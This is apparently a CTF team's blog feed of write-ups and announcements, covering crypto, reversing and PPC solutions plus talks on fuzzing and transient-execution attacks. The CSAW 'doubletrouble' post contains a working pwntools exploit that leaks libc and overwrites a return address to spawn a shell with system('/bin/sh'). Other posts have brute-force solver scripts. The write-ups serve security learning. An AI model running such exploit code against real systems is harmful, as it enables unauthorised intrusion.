The key insight to solve the challenge is that g^a = b-th root of 0x0102030405060708091011121314151617181920212223242526272829303132 mod p

Now the n-th root of a number modulo m is very easy to compute if it exists, after all, it is how RSA decryption works.

You need to find a number d so that d*n = 1 mod phi(m), then you can just exponentiate a number to the d-th power to get its n-th root

The only thing left to do is to recover b since it is unknown.

The key idea is that we know g^b mod p so b is just the discrete logarithm of this value in base g

Now the discrete logarithm is actually a very difficult problem to solve in general, but in our case, we can make use of three facts:

p can be very large (1000 hex digits)
b can be small compared to p
p - 1 can have many divisors

So mainly thanks to point 2 and 3 we can use pohlig hellman algorithm to solve the discrete logarithm.

To do so we repeatedly

generate q as a 0x200 bits prime, then we generate several (in my final exploit ~100) small primes
check that p = 2 * q * primes + 1 is prime Now that we have the correct p and q we can store them to use in the exploit

During the CTF I used

P = 0xa9df7c921bd2b3ba34017a30cc7aa17d22a57fb5f5076797e6485529ba0ae8913c1a4eb533e81c0618ec8ad07406bed05ce7ead5562105804047ec68fa2b50ba27914f07401ed0b4f33069d7ff00acf32605931750f2dd358fc59a6a9a8cafcb05b6b37a110f717319eb936f3e7d8b935503499d754f14d3a80114dd04123bdb36bd79a126326819460967d18a7ba987fa4927113afc935d8089696ddbf5e35a2aff1265982b978db0630b1102854abbde6fd2d616bfaf1c3e087ec81fc5e7feb3bad8716fb59085ce7e191ec790c87020fb53dc44085163a612981d8755
Q= 0x15e8976b40fcebcba59bc85604b886744dbccb914611e3b52e0ed4dbb3d38cca9ef62169ce8ce3fed3712eb3245a581a93ae1f61a38d3e41a5549e6c5ce5926829824b22f

You can try to factor p to see how nice and small its factors are.

A successful exchange looks like this

p (in hexadecimal, length <= 1000) : a9df7c921bd2b3ba34017a30cc7aa17d22a57fb5f5076797e6485529ba0ae8913c1a4eb533e81c0618ec8ad07406bed05ce7ead5562105804047ec68fa2b50ba27914f07401ed0b4f33069d7ff00acf32605931750f2dd358fc59a6a9a8cafcb05b6b37a110f717319eb936f3e7d8b935503499d754f14d3a80114dd04123bdb36bd79a126326819460967d18a7ba987fa4927113afc935d8089696ddbf5e35a2aff1265982b978db0630b1102854abbde6fd2d616bfaf1c3e087ec81fc5e7feb3bad8716fb59085ce7e191ec790c87020fb53dc44085163a612981d8755
q (in hexadecimal, length <= 1000) : 15e8976b40fcebcba59bc85604b886744dbccb914611e3b52e0ed4dbb3d38cca9ef62169ce8ce3fed3712eb3245a581a93ae1f61a38d3e41a5549e6c5ce5926829824b22f
g (in hexadecimal, 0x2 <= g <= 0x40 ) : 11
g^b : 27fb8125b71e4830d06fde55c811077529e410b58dfe884ec6bf23c5b61c9c4bde762ce996ba05162a033810ef67e4922fc18b09ece4e75d3413a12de9f8d3c7f377605f7441500119a149bc0477d816208b3f9d422f6eea68c37475b0e2826e89794139cb3553f5c910366dcd16a6f673e5e2f7f787f9dec05517f62935ce7a5fd52f9b486a9116820c85b36554b695c36fd138d413fe775398ae890af70895b2fad922d75f76becd728af00ffd7ca6cded4e0e2325a578b9ccc89113ec9a904442b1c26ea93794ed810a145c46225c2b74affed832b6d847be5e664524
input g^a (in hexadecimal, length <= 1000) :
67d8fe777cde8cd0895428c60af3b194d9b958260cd4d5983bc127c4355b22482d2fa1346dde1eb2e1494832797f504d2c00aeabc559c63e60372987df8ce1e885835a0592cac48cf6667b4390f6be9fcf15410e1649212dd3d0cfa8862cf3213d3ee090fd7738ab107d24d4c61c0d7e2a63e266d767f5efc4765ef747ff4cf4f29eee28a77e06f7fd7643ffa62c42b7837f2a0ad8a4487ecdbe40e54e4ec48f4f5852211aa7dd5994a58574c72eca43d2003e6354df5a48eec2ec88467334ec4b68f6199174460ac49790c882aecc68497a5f617326b58e6ebfc4f8f197
DH key exchange succeeded!
Key : 0102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f20

Difficulties

Reverse engineering cryptographic algorithm can be painful

Debugging on windows if you are not used to is very painful

Following the organizers’ hint could prevent you to solve the challenge

At some point before I began to work on the challenge, the organizers posted a hint: “Pseudo prime”

In my opinion, this hint is very misleading since one can waste a lot of time trying to make the Rabin Miller prime test fail, but it is not needed to solve the challenge.

BOH Challenges

info@theromanxpl0.it (TRX) — Sun, 07 Apr 2019 00:00:00 +0000

boh-lang is an intentionally vulnerable language.

Source here.

I (malweisse) developed this shitty language to teach our new members about the art of exploitation and now I’m going to release it with the same porpuse but for the entire community this time.

Join the mini individual CTF here to test your pwning ability.

This language has a compiler and a VM written in C++ (in less than 8k lines). There are different challenges with different vulnerabilities, the hardest is the one related to the compiler optimizations (Trust my compiler).

There are two reasons behind this: teaching compiler theory (In our university a serious course is missing DOH!) and exploitation in a practical way.

Have fun and learn as much as possible!

Fuzzing like the Legendary Super Saiyan

info@theromanxpl0.it (TRX) — Fri, 29 Mar 2019 00:00:00 +0000

Many people asked me to do this talk. So now i did it and of you missed it shame on you!

I’m joking, you can read here an introduction to fuzzers showing strengths and weakness of this approach in automatic bug detection. In particular the talk is focus into the usage and the internals of one of the most popular fuzzers of this time: American Fuzzy Lop. You will read not only how to use it but also some useful strategies that can be applied to specified classes of programs to improve the performance of AFL.

Transient Execution Attacks explained to your Grandma

info@theromanxpl0.it (TRX) — Fri, 22 Feb 2019 00:00:00 +0000

What? Reading kernel memory from user space? What?

I explained, at the 5th meeting of DC11396, how modern processor optimizations such as branch prediction and out-of-order execution may lead to leak of secrets through the CPU’s microarchitectural state. Numerous attacks have been proposed, this is an overview of the state of the art of these techniques:

Flare-On5 #12, a trip into bootkits and esoteric ISAs

info@theromanxpl0.it (TRX) — Fri, 16 Nov 2018 00:00:00 +0000

In the third meeting of DC11396 I presented my solution to the last problem of Flare-On 2018, the annual individual reverse engineering CTF.

This challenge seems “easy”, it is “only” a normal bootkit. Well no, this one has two layers of virtual machine obfuscation with esoteric ISAs! Spooky!

Here are my presentation slides:

CSAW Quals 18 - doubletrouble

info@theromanxpl0.it (TRX) — Mon, 17 Sep 2018 00:00:00 +0000

The core function is the following:

int game()
{
  int v0;
  long double sum;
  long double max;
  long double min;
  int v4;
  int how_long;
  int idx;
  char *s;
  double array[64];
  unsigned int v10;

  canary = __readgsdword(0x14u);
  printf("%p\n", array);  // Stack address leak
  printf("How long: ");
  __isoc99_scanf("%d", &how_long);
  getchar();
  if ( how_long > 64 )
  {
    printf("Flag: hahahano. But system is at %d", &system);
    exit(1);
  }
  idx = 0;
  while ( idx < how_long )
  {
    s = malloc(100u);
    printf("Give me: ");
    fgets(s, 100, stdin);
    v0 = idx++;
    array[v0] = atof(s);
  }
  printArray(&how_long, array);
  sum = sumArray(&how_long, array);
  printf("Sum: %f\n", sum);
  max = maxArray(&how_long, array);
  printf("Max: %f\n", max);
  min = minArray(&how_long, array);
  printf("Min: %f\n", min);
  v4 = findArray(&how_long, array, -100.0, -10.0);
  printf("My favorite number you entered is: %f\n", array[v4]);
  sortArray(&how_long, array);
  puts("Sorted Array:");
  return printArray(&how_long, array);
}

The programs store the readed doubles in an array on the stack. The array is 532 bytes from the return address, so 64 entries are not enough for a buffer overflow.

The findArray function is interesting, a correct manipulation of the input can change the how_long variable.

int findArray(int *len, double *arr, double a, double b)
{
  int saved_len;

  saved_len = *len;
  while ( *len < 2 * saved_len )
  {
    if ( arr[*len - saved_len] > a && b > arr[*len - saved_len] )
      return *len - saved_len; // Here *len is not restored to saved_len
    *len += &GLOBAL_OFFSET_TABLE_ - 134529023; //*len += 1
  }
  *len = saved_len; // We want to avoid this piece of code
  return 0;
}

Giving a number greater than -10 *len is increased and with a number greater than -100 and lower than -10 we can avoid the restring of *len with saved_len.

We choose -1.1 and -20.1.

With how_long greater than 64 the sortArray procedure will sort our input and the values that are on the stack after the array, like the canary and the return address.

The binary addresses casted to double are sorted after -1.1.

To exploit the vulnerability we need to place the canary in the same position before and after the sorting so it must start with 0x00b. Due to this requirement the exploit must be runned many times to work.

Here the exploit:

#!/usr/bin/env python

from pwn import *

LIBC_NAME = "./libc6_2.27-3ubuntu1_i386.so" # found on libc database using system (0x200)

def pdouble(f):
    return struct.pack(', f)

def double_to_hex(f):
    return hex(struct.unpack(', struct.pack(', f))[0])

def int_to_double(i):
    return struct.unpack(', p64(i))[0]

def hex_to_double(h):
    return struct.unpack(', h.decode("hex")[::-1])[0]

libc = ELF(LIBC_NAME)

while True:
    #p = process("./doubletrouble", env={"LD_PRELOAD": LIBC_NAME})
    p = remote("pwn.chal.csaw.io", 9002)

    try:

        ### STAGE 1 - leak libc a restart main

        stack = int(p.recvline(False), 16)

        l = 64
        p.sendafter("How long: ", str(l) + "\n")

        p.sendafter("Give me: ", repr(int_to_double(0x8049506FFE26D6C)) + "\n") #main = 0x8049506
        p.sendafter("Give me: ", repr(int_to_double(0x8049506FFE26D6C)) + "\n")

        for i in xrange(3):
            p.sendafter("Give me: ", "-1.1\n")

        for i in xrange(l -5):
            p.sendafter("Give me: ", "-20.1\n")

        p.recvuntil("Sorted Array:")
        p.recvuntil("0:")

        off = 0xf7f8bfff - 0xF7DB4000

        libc.address = u32(pdouble(float(p.recvline(False)))[4:]) - off
        if libc.address & 1 == 1:
            libc.address -= 1

        print "LIBC: ", hex(libc.address), hex(libc.symbols["system"])[2:]

        p.recvuntil("68:") + p.recvline(False)


        ### STAGE 2 - execute system("/bin/sh")

        stack = int(p.recvline(False), 16)

        l = 64
        p.sendafter("How long: ", str(l) + "\n")

        v = hex_to_double(("0804900a0804900a")) #0x0804900a : ret
        p.sendafter("Give me: ", repr(v) + "\n")

        v = hex_to_double("0804A0D5" + hex(libc.symbols["system"])[2:])
        p.sendafter("Give me: ", repr(v) + "\n")

        bin_sh = libc.address + 0x17e0cf
        v = hex_to_double(("09049786" + hex(bin_sh)[2:]))
        p.sendafter("Give me: ", repr(v) + "\n")

        for i in xrange(2):
            p.sendafter("Give me: ", "-1.1\n")

        for i in xrange(l -5):
            p.sendafter("Give me: ", "-20.1\n")

        p.recvuntil("Sorted Array:")
        p.recvuntil("0:")

        p.interactive()
        p.close()
    except KeyboardInterrupt:
        p.close()
        exit()
    except Exception:
        p.close()
        continue

The most boring

info@theromanxpl0.it (TRX) — Mon, 30 Apr 2018 00:00:00 +0000

*******************************************************************************
| hi all, welcome to the most Boring task, but I think its interesting for all|
| Think about a rotating drum, each of the segments is of one of three types, |
| such that any k consecutive segments uniquely determine the position of the |
| drum, example: for k = 3, the circular sequence 111220120210110200100022212 |
| has desired property. In each stage, send us three distinct sequences with  |
| given k, and get the valuable flag :))                                      |
*******************************************************************************

Easy, right? Probably the hardest part was understanding the question. While it doesn’t say it explicitly, the sequences needed to contain all possible subsequences of length k. This means that they had to be de Bruijn sequences. Luckily the Wikipedia page also contains python code to generate those sequences, so by just writing a small wrapper around it I got to the flag. The only missing part was how to generate three different sequences, but it was enough to swap che characters around for them to be different (e.g. 001122 -> 110022)

import itertools, hashlib, sys
from pwn import *

def bruijn(k, n):
	alphabet = list(map(str, range(k)))

	a = [0] * k * n
	sequence = []

	def db(t, p):
		if t > n:
			if n % p == 0:
				sequence.extend(a[1:p + 1])
		else:
			a[t] = a[t - p]
			db(t + 1, p)
			for j in range(a[t - p] + 1, k):
				a[t] = j
				db(t + 1, t)
	db(1, 1)
	return "".join(alphabet[i] for i in sequence)

def captcha(target):
	target = target.strip().split(' ')[-1]
	print '[+] Solving captcha for', target
	alpha = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
	for a,b,c,d,e in itertools.product(alpha, repeat=5):
		if hashlib.sha256(a+b+c+d+e).hexdigest()[-6:] == target:
			return a+b+c+d+e
	print "[!] Captcha unsolved"
	quit()

def solve(line, r):
	k = int(line.strip().split(' ')[-1])
	print '[+] Solving for k =', k
	sol = bruijn(3, k)
	r.recvuntil('first sequence:')
	r.sendline(sol)
	r.recvuntil('second sequence:')
	sol = sol.replace('0', 'a').replace('1', '0').replace('a', '1')
	r.sendline(sol)
	r.recvuntil('third sequence:')
	sol = sol.replace('0', 'a').replace('2', '0').replace('a', '2')
	r.sendline(sol)

r = remote('37.139.22.174', 56653)

s = r.readline()
while not s.startswith('Submit'):
	s = r.readline()
r.sendline(captcha(s))

while True:
	s = r.readline()
	solve(s, r)
	s = r.readline()
	while len(s.strip()) == 0:
		s = r.readline()
	if 'ASIS' in s:
		print s
		break

(pwn) dario@PC:~/desktop/ctf/asisquals2018/boring$ python t.py
[+] Opening connection to 37.139.22.174 on port 56653: Done
[+] Solving captcha for c18349
[+] Solving for k = 3
[+] Solving for k = 4
[+] Solving for k = 5
[+] Solving for k = 6
[+] Solving for k = 7
[+] Solving for k = 8
[+] Solving for k = 9
Congratz! :) You got the flag: ASIS{67f99742bdf354228572fca52012287c}

[*] Closed connection to 37.139.22.174 port 56653

N1CTF 2018 - MathGame

info@theromanxpl0.it (TRX) — Mon, 12 Mar 2018 00:00:00 +0000

Game rules:

A 7*7*7 cube consists of 343 cubes, These are 218 cubic cells in the surface, and 125 cubic cells in the internal.

We put numbers in 218 cubes, of which seven cubes number have different attributes than others (for example, odd and even, prime and non-prime).

Connect these seven cubes to form 21 straight lines. Only two of these 21 straight lines are perpendicular and go through the same internal cube.

Please give the coordinates of this internal cube. If you answer 5 Question, you will get the flag.

Basically, we’re given the six faces of the cube as 7*7 grids from which we have to reconstruct the cube, find the seven “different” numbers, connect them, find two perpendicular lines which go through the same internal cube and return its coordinates.

This would seem like an easy ppc challenge: read the numbers, build the cube, find a few lines and give back the solution. Right? Hell, no. While theoretically it’s easy, we had many roadblocks in front of us to step over before finally reaching our flag.

At first there was a bug in the challenge itself that meant that the faces given weren’t consistent with one another. Fine, go to sleep and wake up the next morning while the organizers fix it. After building the cube we implemented some checks (even/odd and prime/not prime were the first ones) and went on to finding the perpendicular lines. While it may seem complicated, it’s actually pretty easy with some analytical geometry. Basically, a line in 3D space can be described with the following equation:

$$\frac{x-x_a}{l} = \frac{y-y_a}{m} = \frac{z-z_a}{n}$$$$l = x_b-x_a, m = y_b-y_a, n = z_b - z_a$$

where $(x_a,y_a)$ and $(x_b,y_b)$ are the start and end points of the segment.

Two lines are perpendicular if and only if $l\cdot l’+m\cdot m’ + n\cdot n’ = 0$. If you’re like me, you’re probably staring at those equations and wondering why they work - let’s just say they do.

The other geometry task we have is finding which cubes a given segment goes through. I did it the simple way, by evaluating the segment at various points and rounding the coordinates to the nearest integer. Let’s see the code, shall we?

# Segment between a and b
class Line:
	def __init__(self, a, b):
		self.l, self.m, self.n = b[0] - a[0], b[1] - a[1], b[2] - a[2]
		self.a, self.b = a, b
	def perpendicular(self, b):
		return self.l * b.l + self.m * b.m + self.n * b.n == 0
	def points(self):
		# Just go into parametric form and evaluate. It's ugly but it kinda works
		out = set()
		for t in range(0, 10001):
			x = int(round(self.a[0] + t * self.l / 10000.0))
			y = int(round(self.a[1] + t * self.m / 10000.0))
			z = int(round(self.a[2] + t * self.n / 10000.0))
			out.add((x,y,z))
		return out
	def __repr__(self):
		return str(self.a) + ' -> ' + str(self.b)

It was at this point that we encountered another roadblock: the code didn’t work all the time - in fact, it often gave multiple solutions or none at all. But frankly I was tired and went forward nonetheless.

The main part was now done, all that remained was finding the characteristics we needed to select the seven numbers. Even/odd and prime/nonprime were already in place and managed to solve the first four levels of the challenge, while the fifth took us a bit more time. We tried a lot of possibilities and in the end the one that worked was based on the size of the prime factors of the numbers. More specifically, the seven numers had “small” factors - less than 10000, while the others only had bigger factors.

The code was now complete but it would still often fail, so I just left it in a bash loop running in the background. After a few minutes, it stopped and finally gave us the flag: N1CTF{This_1s_a_1j_Math_Game4!}

As you may have noticed, I’ve written this article in plural: while in the end it was my code to get the flag, this challenge only got solved because a few of us worked on it. Code, as usual:

#!/usr/bin/python
# -*- coding: utf-8 -*-

from pwn import *
from math import *
from collections import defaultdict
import random, string, hashlib, sys
import sympy, numpy

def captcha():
	line = r.readline()
	while len(line.strip()) == 0:
		line = r.readline().strip()
	base, target = line.split('"')[1::2]
	print 'Solving captcha for', base, target

	while True:
		z = ''.join(random.choice(string.ascii_letters) for _ in range(10))
		h = hashlib.sha256(base + z).hexdigest()
		if h.startswith(target):
			r.sendline(z)
			break

def readFace(name):
	print 'Reading face', name
	line = r.readline().strip()
	while line != name:
		line = r.readline().strip()

	out = []
	for i in range(7):
		r.readline()
		out.append(map(int, r.readline().strip()[1:-1].split('|')))
	return out

# 90° clockwise
def rotate(face):
	out = []
	for i in range(7):
		row = []
		for j in range(6, -1, -1):
			row.append(face[j][i])
		out += [row]
	return out

def flip(face):
	return face[::-1]

def getFace(a, b, faces, avoid):
	for i in range(6):
		if i == avoid:
			continue
		face = faces[i]
		for _ in range(2):
			for _ in range(4):
				if face[0][0] == a and face[0][6] == b:
					return i, face
				face = rotate(face)
			face = flip(face)
	print "Couldn't get face for", a, b
	quit()

def build(faces):
	nums = set()
	for f in faces:
		for l in f:
			for e in l:
				nums.add(e)
	print 'Nums:', len(nums)

	coords = {}
	# Back face
	for i in range(7):
		for j in range(7):
			coords[faces[0][i][j]] = (j, 6 - i, 0)

	# Left face
	a, b = faces[0][6][0], faces[0][0][0]
	idx, f = getFace(a, b, faces, 0)
	for i in range(7):
		for j in range(7):
			if f[i][j] in coords:
				assert coords[f[i][j]] == (0, j, i)
			else: coords[f[i][j]] = (0, j, i)

	# Right face
	a, b = faces[0][0][6], faces[0][6][6]
	idx, f = getFace(a, b, faces, 0)
	for i in range(7):
		for j in range(7):
			if f[i][j] in coords:
				assert coords[f[i][j]] == (6, 6 - j, i)
			else: coords[f[i][j]] = (6, 6 - j, i)

	# Bottom face
	a, b = faces[0][6][0], faces[0][6][6]
	idx, f = getFace(a, b, faces, 0)
	for i in range(7):
		for j in range(7):
			if f[i][j] in coords:
				assert coords[f[i][j]] == (j, 0, i)
			else: coords[f[i][j]] = (j, 0, i)

	# Top face
	a, b = faces[0][0][0], faces[0][0][6]
	idx, f = getFace(a, b, faces, 0)
	for i in range(7):
		for j in range(7):
			if f[i][j] in coords:
				assert coords[f[i][j]] == (j, 6, i)
			else: coords[f[i][j]] = (j, 6, i)

	# Front face
	a, b = f[6][0], f[6][6]
	idx, f = getFace(a, b, faces, idx)
	for i in range(7):
		for j in range(7):
			if f[i][j] in coords:
				assert coords[f[i][j]] == (j, 6 - i, 6)
			else: coords[f[i][j]] = (j, 6 - i, 6)

	return (coords, nums)

# Line between a and b
class Line:
	def __init__(self, a, b):
		self.l, self.m, self.n = b[0] - a[0], b[1] - a[1], b[2] - a[2]
		self.a, self.b = a, b
	def perpendicular(self, b):
		return self.l * b.l + self.m * b.m + self.n * b.n == 0
	def points(self):
		# Just go into parametric form and evaluate. It's ugly but it kinda works
		out = set()
		for t in range(0, 10001):
			f = round#floor if self.l > 0 else ceil
			x = int(f(self.a[0] + t * self.l / 10000.0))
			y = int(f(self.a[1] + t * self.m / 10000.0))
			z = int(f(self.a[2] + t * self.n / 10000.0))
			out.add((x,y,z))
		return out
	def __repr__(self):
		return str(self.a) + ' -> ' + str(self.b)


# Only even, prime and primefactors were actually needed
def even(x): return x % 2 == 0
def prime(x): return sympy.isprime(x)
def pal(x): return str(x) == str(x)[::-1]
def power(x, b):
	p = int(log(x, b) + 0.5)
	return b ** p == x
def perfect(x, p):
	r = x ** (1.0 / p)
	return int(r + 0.5) ** p == x
def primefactors(x): return sympy.primefactors(x)[0] < 10000

checks = [even, prime, pal, primefactors]

for i in range(2, 30):
	checks.append(lambda c: power(i, c))
	checks.append(lambda c: perfect(i, c))

def check(nums, f):
	m = defaultdict(list)
	for e in nums:
		m[f(e)].append(e)
	if len(m) != 2:
		#print 'Fails', m
		return ([], [])
	out = [x for x in m]
	return (m[out[0]], m[out[1]])

def solve(faces):
	coords, nums = build(faces)

	for c in checks:
		n = check(nums, c)
		if len(n[0]) == 7 or len(n[1]) == 7:
			print 'Check succedeed:', c
			vals = n[0] if len(n[0]) == 7 else n[1]
			print vals

			lines = []
			for i in range(len(vals)):
				for j in range(i):
					lines.append(Line(coords[vals[i]], coords[vals[j]]))

			sol = []
			for i in range(len(lines)):
				for j in range(i):
					a, b = lines[i], lines[j]
					if a.perpendicular(b):
						# print 'Perpendicular:', a, b
						pa = a.points()
						pb = b.points()
						inter = [x for x in pa.intersection(pb) if x[0] * x[1] * x[2] > 0 and x[0] < 6 and x[1] < 6 and x[2] < 6]
						# print inter
						sol += inter
			print 'Solutions:', sol
			if len(sol) == 0:
				print 'No solution found'
				# print faces
				quit()

			return sol[0]

	print 'No solver found'
	print faces
	quit()

if __name__ == "__main__":
	r = remote('47.75.60.212', 11011)

	captcha()
	if len(sys.argv) > 1:
		r.interactive()
		quit()

	for _ in range(5):
		print "=== Solving level", _, '==='

		try:
			faces = [readFace(ch) for ch in 'ABCDEF']
		except:
			print "Nope, failed again :/"
			quit()

		sol = solve(faces)

		r.recvuntil('x:')
		r.sendline(str(sol[0]))
		r.recvuntil('y:')
		r.sendline(str(sol[1]))
		r.recvuntil('z:')
		r.sendline(str(sol[2]))

	r.interactive()

[+] Opening connection to 47.75.60.212 on port 11011: Done
Solving captcha for qslkSm 35833
=== Solving level 0 ===
Reading face A
Reading face B
Reading face C
Reading face D
Reading face E
Reading face F
Nums: 218
Check succedeed: <function even at 0xcafebabe>
[4769684666, 6209217742, 6023565020, 7908922760, 6252119964, 4968995262, 6573984764]
Solutions: [(2, 2, 2)]
=== Solving level 1 ===
Reading face A
Reading face B
Reading face C
Reading face D
Reading face E
Reading face F
Nums: 218
Check succedeed: <function even at 0xdeadbeef>
[6904338941, 5817587951, 7750062409, 8317821287, 4624044927, 5387137963, 8289714159]
Solutions: [(3, 2, 5), (3, 2, 4)]
=== Solving level 2 ===
Reading face A
Reading face B
Reading face C
Reading face D
Reading face E
Reading face F
Nums: 218
Check succedeed: <function prime at 0xbaadcafe>
[4204061747, 3292669631, 3645316397, 3266714431, 2589252553, 2910816229, 3490277359]
Solutions: [(5, 3, 4), (5, 4, 4)]
=== Solving level 3 ===
Reading face A
Reading face B
Reading face C
Reading face D
Reading face E
Reading face F
Nums: 218
Check succedeed: <function prime at 0xbaadf00d>
[6813711975, 7612598477, 8432017163, 7160284219, 6027848751, 8535782963, 6826067957]
Solutions: [(5, 4, 5)]
=== Solving level 4 ===
Reading face A
Reading face B
Reading face C
Reading face D
Reading face E
Reading face F
Nums: 218
Check succedeed: <function primefactors at 0xb000dead>
[194668571, 288244259, 825663691, 406614797, 593067869, 353542379, 845340763]
Solutions: [(3, 3, 3)]
[*] Switching to interactive mode
 N1CTF{This_1s_a_1j_Math_Game4!}
[*] Got EOF while reading in interactive

TAMUctf 18 - SimpleDES

info@theromanxpl0.it (TRX) — Sat, 03 Mar 2018 00:00:00 +0000

import random

def binaryStringToInt(s):
 return int(s[:8], 2)

def charToBinary(c):
 return bin(ord(c))[2:].zfill(8)

def stringToBinary(s):
 r = ''
 for c in s:
 r += charToBinary(c)
 return r

def XORBinaryStrings(a, b):
 r = ''
 l = min(len(a), len(b))
 for i in range(l):
 r += str(int(a[i]) ^ int(b[i]))
 return r

def divideIntoBlocks(s, N):
 r = []
 while len(s) > 0:
 r.append(s[:N])
 s = s[N:]
 return r

def createSBoxS1():
 d = {}
 d['0000'] = '101'
 d['0001'] = '010'
 d['0010'] = '001'
 d['0011'] = '110'
 d['0100'] = '011'
 d['0101'] = '100'
 d['0110'] = '111'
 d['0111'] = '000'
 d['1000'] = '001'
 d['1001'] = '100'
 d['1010'] = '110'
 d['1011'] = '010'
 d['1100'] = '000'
 d['1101'] = '111'
 d['1110'] = '101'
 d['1111'] = '011'
 return d

def createSBoxS2():
 d = {}
 d['0000'] = '100'
 d['0001'] = '000'
 d['0010'] = '110'
 d['0011'] = '101'
 d['0100'] = '111'
 d['0101'] = '001'
 d['0110'] = '011'
 d['0111'] = '010'
 d['1000'] = '101'
 d['1001'] = '011'
 d['1010'] = '000'
 d['1011'] = '111'
 d['1100'] = '110'
 d['1101'] = '010'
 d['1110'] = '001'
 d['1111'] = '100'
 return d

def generateRandomString(length):
 r = ''
 for i in range(length):
 c = random.randint(0, 255)
 r += chr(c)
 return r

def simpleDES(R, binKey, plaintext):

 # Methods to create our S-boxes
 d1 = createSBoxS1()
 d2 = createSBoxS2()
 cyphertext = ''

 # Let's use a list of chars instead of a string
 binaryKey = list(binKey)

 # Divide into blocks
 tmp = stringToBinary(plaintext)
 blocks = divideIntoBlocks(tmp, 12)

 for i in range(len(blocks)):
 block = blocks[i]
 Lr, Rr = block[:6], block[6:]
 for r in range(R):
 # Remapping values of Rr
 Rr_remap = Rr[:2] + Rr[3:4] + Rr[2:3] + Rr[3:4] + Rr[2:3] + Rr[4:]
 # XOR the result with 8 bits of key beginning with key[i*R+r]
 index = i*R+r
 xorLeft = 8
 x = ''
 while xorLeft > 0:
 tmp = str(int(binaryKey[index]) ^ int(Rr_remap[8-xorLeft]))
 x += tmp
 index += 1
 index %= len(binaryKey)
 xorLeft -= 1
 # Divide the result into 2 4-bit sections S1, S2
 S1, S2 = x[:4], x[4:8]
 # Concatenate the result of the S-boxes
 v = d1[S1] + d2[S2]
 # XOR the result with Lr
 Lr_xored = XORBinaryStrings(Lr, v)
 cyphertext += Lr_xored
 Lr = Rr
 Rr = Lr_xored

 return cyphertext

R = 2
key = 'Mu'
binaryKey = stringToBinary(key)
cypher = '011001010010001010001100010110000001000110000101'

i = 0
flag = 'Gigem{'
b = ''
while True:
 s = generateRandomString(6)
 binaryS = stringToBinary(s)
 r = simpleDES(R, binaryKey, s)
 if r[i:i+12] == cypher[i:i+12]:
 b += binaryS[i:i+12]
 i += 12
 if i == 48:
 # Finished
 break

while len(b) > 0:
 flag += chr(binaryStringToInt(b))
 b = b[8:]
print flag + '}'

This prints out our flag: Gigem{M1N0N!}

TAMUctf 18 - DESpicable me

info@theromanxpl0.it (TRX) — Thu, 01 Mar 2018 00:00:00 +0000

Looks like Gru needs a new encryption scheme to facilitate his communication with the criminal council.

Larry came up with a modified DES algorithm that he is pretty proud of…but this is Larry we are talking about.

Make sure you can actually decrypt the message.

Below is an encrypted communication between Gru and Larry used to test the algorithm. They used the following to encrypt the message.

larrycrypt -R 4 -K "V3c70R" -m message

Encrypted Bits: 000101 000000 100111 011001 101110 011101 001110 101111 010001 101111 110000 001001 110010 111011 110111 010001 000100 101011 100010 100010 000001 010100 001111 010010 111110 001110 000111

Here is some relaxing music to soothe your frustration https://www.youtube.com/watch?v=9RHFFeQ2tu4

Being a reversing challenge, I first tried actually reversing it. Crypto algorithms are kind of boring when reversing though, especially unknown ones, so we moved on to other means to get to the flag. I made some assumptions that looked reasonable and made a bruteforce possible:

that the encryption of each group of three input bytes was only dependent on previous bytes
that after the first triplet that produces three output bytes all others would produce four
that in each triplet other than the first the first character influenced the first output byte, the first and the second the second output byte, all three the full four byte output

Note that the solution is not necessarily unique when considering a prefix of the flag.

We had already obtained the first three bytes (Gig) with a bit of guessing, so with these considerations in mind, I wrote (not without some effort, I had to change my assumptions a few times) a bruteforce that in less than 15 minutes got us the flag:

import subprocess
import string
import random

alpha = [x for x in string.printable]
random.shuffle(alpha)

# Target string, without the first three octects which were bruteforced separately
target = '011001 101110 011101 001110 101111 010001 101111 110000 001001 110010 111011 110111 010001 000100 101011 100010 100010 000001 010100 001111 010010 111110 001110 000111'
target = target.split(' ')

def findThree(base):
	global target
	if len(target) < 4:
		#print "At least four output bytes are required"
		return []

	first = []
	for ch in alpha:
		if ch == '"' or ch == '`': continue
		out = subprocess.check_output('./larrycrypt -R 4 -K V3c70R -m "' + base + ch + 'aa"', shell=True).strip()
		if out.split(' ')[-4] == target[0]:
			first.append(ch)
	if len(first) == 0:
		return []
	# print "Possible first chars:", first
	target = target[1:]

	second = []
	for f in first:
		for ch in alpha:
			if ch == '"' or ch == '`': continue
			out = subprocess.check_output('./larrycrypt -R 4 -K V3c70R -m "' + base + f + ch + 'a"', shell=True).strip()
			if out.split(' ')[-3] == target[0]:
				second.append(f + ch)
	if len(second) == 0:
		return []
	# print "Possible two byte prefixes:", second
	target = target[1:]

	third = []
	for s in second:
		#print base + s
		for ch in alpha:
			if ch == '"' or ch == '`' or ch == '\\': continue
			out = subprocess.check_output('./larrycrypt -R 4 -K V3c70R -m "' + base + s + ch + '"', shell=True).strip()
			if out.split(' ')[-2] == target[0] and out.split(' ')[-1] == target[1]:
				third.append(base + s + ch)
	# print "Possible outputs:", third
	return third

start = ['Gig']
while len(target) > 0:
	out = []
	for e in start:
		t_target = target
		out += findThree(e)
		target = t_target

	start = out
	target = target[4:]
	print out

print [x for x in out if x[-1] == '}']

Which gave me GigEm{I7's5ofLUFfy:)}" as the flag.

dario@PC:~/desktop/ctf/tamu18/rev200$ time python t1.py
['GigEh%', 'GigEm{', 'GigFAD']
["GigEm{I7'"]
["GigEm{I7's5o", "GigEm{I7's5s", "GigEm{I7's5I", "GigEm{I7's5l"]
["GigEm{I7's5ofLU", "GigEm{I7's5ofLD", "GigEm{I7's5lqV>", "GigEm{I7's5lq_z", "GigEm{I7's5ls6;"]
["GigEm{I7's5ofLUFfy", "GigEm{I7's5ofLUFfp"]
["GigEm{I7's5ofLUFfy:)}", "GigEm{I7's5ofLUFfy:)p"]
["GigEm{I7's5ofLUFfy:)}"]

real    13m32.338s
user    1m35.500s
sys     11m26.359s

Xiomara 2018 - Custom HEN

info@theromanxpl0.it (TRX) — Mon, 26 Feb 2018 00:00:00 +0000

After a rocky start we managed to get a kind of understandable problem statement.

We are given a custom cipher with references to an “alphametic puzzle”.

After a quick search I found http://www.tkcs-collins.com/truman/alphamet/alpha_solve.shtml

And I got a mapping from letters to digits

eflag = '082_336_88_167755403'.split('_')
enc = {'C': 0, 'F': 2, 'G': 1, 'H': 9, 'K': 3, 'N': 4, 'P': 5, 'U': 6, 'Y': 7, 'Z': 8}
